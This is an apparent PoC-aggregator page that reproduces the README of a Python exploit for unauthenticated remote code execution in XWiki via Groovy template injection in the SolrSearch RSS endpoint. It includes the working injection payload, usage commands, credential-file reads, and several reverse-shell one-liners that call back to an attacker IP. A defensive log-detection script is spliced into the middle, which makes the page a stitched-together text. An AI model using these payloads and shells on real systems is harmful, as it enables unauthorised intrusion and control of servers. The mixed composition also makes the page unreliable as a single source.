Associated vulnerability
Description
Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
Introduction
            # XWiki SSTI Exploit
A Python exploit for the XWiki Server-Side Template Injection (SSTI) vulnerability, injecting a Groovy template through the SolrSearch endpoint.
## Vulnerability
- **Type**: Server-Side Template Injection (SSTI)
- **Component**: XWiki SolrSearch RSS feed
- **Impact**: Remote Code Execution
- **Affected Version**: XWiki 15.10.8 (and potentially others)
## Requirements
```bash
pip3 install requests beautifulsoup4
```
## Usage
### Test for Vulnerability
```bash
./xwiki_exploit.py -u http://target --test
```
### Execute Single Command
```bash
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"
```
### Interactive Shell
```bash
./xwiki_exploit.py -u http://target.com
```
This will give you an interactive pseudo-shell where you can run commands:
```
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit
```
### Debug Mode
```bash
./xwiki_exploit.py -u http://target.com -c "id" --debug
```
### Command-Line Options
- `-u, --url URL`: Target URL (required)
- `-c, --command CMD`: Execute single command
- `--test`: Test if target is vulnerable
- `--no-verify-ssl`: Disable SSL certificate verification
- `--debug`: Enable debug output
## Examples
**Information Gathering:**
```bash
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"
```
**Find Interesting Files:**
```bash
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"
```
**Network Information:**
```bash
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"
```
**Establish Reverse Shell:**
```bash
# On attacker machine, start listener:
nc -lvnp 1337
# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"
```
## Technical Details
### Payload Structure
The exploit uses the following SSTI payload structure:
```
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}
```
### Exploitation Flow
1. The payload is URL-encoded and sent to the vulnerable endpoint:
   ```
   /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
   ```
2. The server processes the Groovy template and executes the command
3. The output is captured from the RSS feed response in the format:
   ```
   search on [}}OUTPUT]
   ```
4. The exploit parses the HTML response to extract the command output
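A defender-side complement to the flow above, added here and not part of the tool's README: a small Python log-triage routine that flags SolrSearch requests whose `text` parameter carries XWiki macro markers once URL decoding is undone, including a double-encoded variant. The log lines, client addresses and the `analyse_request` / `detect_solrsearch_ssti` names are constructed for illustration; the endpoint and payload template are the ones documented above.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Endpoint and macro markers taken from the payload structure described above.
SOLRSEARCH_PATH = "/xwiki/bin/view/Main/SolrSearch"
MACRO_MARKERS = ("{{groovy}}", "{{/groovy}}", "{{async", "{{/async}}")
# The page's payload template, with COMMAND left as a literal placeholder.
PAYLOAD_TEMPLATE = '}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}'

# Constructed combined-log lines (RFC 5737 test addresses): a benign search,
# a single-encoded injection, a double-encoded injection, an unrelated page.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:12:00:00 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=meeting+notes HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2025:12:00:05 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text='
    + quote(PAYLOAD_TEMPLATE, safe="") + ' HTTP/1.1" 200 640',
    '198.51.100.9 - - [01/Jan/2025:12:00:07 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text='
    + quote(quote(PAYLOAD_TEMPLATE, safe=""), safe="") + ' HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2025:12:00:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120',
]

# Request line inside a combined-log entry: "METHOD target HTTP/x.y"
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def analyse_request(target: str):
    """Return the decoded `text` parameter when `target` is a SolrSearch request
    carrying XWiki macro markers, else None. Any `media` value is checked, not
    only rss, since the injected macro is what matters."""
    parts = urlsplit(target)
    if not parts.path.endswith(SOLRSEARCH_PATH):
        return None
    # parse_qs decodes one layer; unquote strips a second layer (double encoding).
    for raw in parse_qs(parts.query, keep_blank_values=True).get("text", []):
        decoded = unquote(raw)
        if any(marker in decoded for marker in MACRO_MARKERS):
            return decoded
    return None

def detect_solrsearch_ssti(log_lines):
    """Return (client_ip, decoded_text) for every line that looks like a
    SolrSearch macro injection; other lines are ignored."""
    hits = []
    for line in log_lines:
        match = _REQUEST_RE.search(line)
        if match is None:
            continue
        decoded = analyse_request(match.group("target"))
        if decoded is not None:
            hits.append((line.split(" ", 1)[0], decoded))
    return hits
```

Running `detect_solrsearch_ssti(SAMPLE_LOG)` returns the two injected requests from 198.51.100.9 with the payload fully decoded, and ignores the ordinary search and the unrelated page.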
## Notes
- Commands are executed as the `xwiki` user (uid=997)
- Working directory is `/usr/lib/xwiki-jetty`
- Some commands may not produce output if they fail or run in the background
- For complex commands, consider using shell scripts or base64 encoding
## Disclaimer
This tool is for educational and authorized penetration testing purposes only. Only use it on systems you have permission to test.
File snapshot
 [4.0K]  /data/pocs/bbb5cd99cd36d864cfcf5492c8f61547db1fc06e
├── [3.2K]  README.md
└── [7.3K]  xwiki_exploit.py
0 directories, 2 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.